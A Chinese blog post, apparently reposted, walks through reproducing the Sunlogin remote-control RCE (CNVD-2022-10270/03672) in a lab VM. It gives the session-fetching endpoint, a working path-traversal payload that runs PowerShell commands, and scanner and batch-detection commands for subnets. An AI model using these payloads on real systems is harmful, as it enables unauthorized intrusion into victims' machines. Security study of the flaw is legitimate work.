向日葵RCE复现 CNVD-2022-10270/CNVD-2022-03672

304 阅读2分钟

CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现

前言

向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。

于2022年2月5日和2022年2月15日,CNVD公开上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。

影响版本

向日葵个人版   for Windows <= 11.0.0.33
向日葵简约版   <= V1.0.1.433152021.12

漏洞级别

高危

环境搭建

在虚拟机里安装11.0.0.33的低版本向日葵

image-20230219135253229

漏洞复现

使用nmap或其他工具探测目标端口

image-20230219135507131

在浏览器中访问ip+端口号+cgi-bin/rpc?action=verify-haras (端口号:每一个都尝试,直到获取到session值CID)

image-20230219150724105

Cookies添加拿到的CID后加上payload请求

http://192.168.52.133:49437/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+ whoami

image-20230219151000880

image-20230219151134780

手动复现完成

工具使用

使用工具自带的扫描

xrkRce.exe -h ip -t scan

image-20230219152233952

测试命令执行

image-20230219153035239

批量检测

python3 sunlogin-fuzz.py -t 192.168.52.128/25

image-20230219162629384

相关工具文件,安装包私信公众号向日葵获取

原文转载自,助安社区(secself.com/)

关注公众号【助安社区】渗透零基础到入门都在这,社区内部红队沙龙、资源共享和大厂工作经验。真正热爱安全和喜欢技术交流的小伙伴欢迎加入我们。

声明

本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。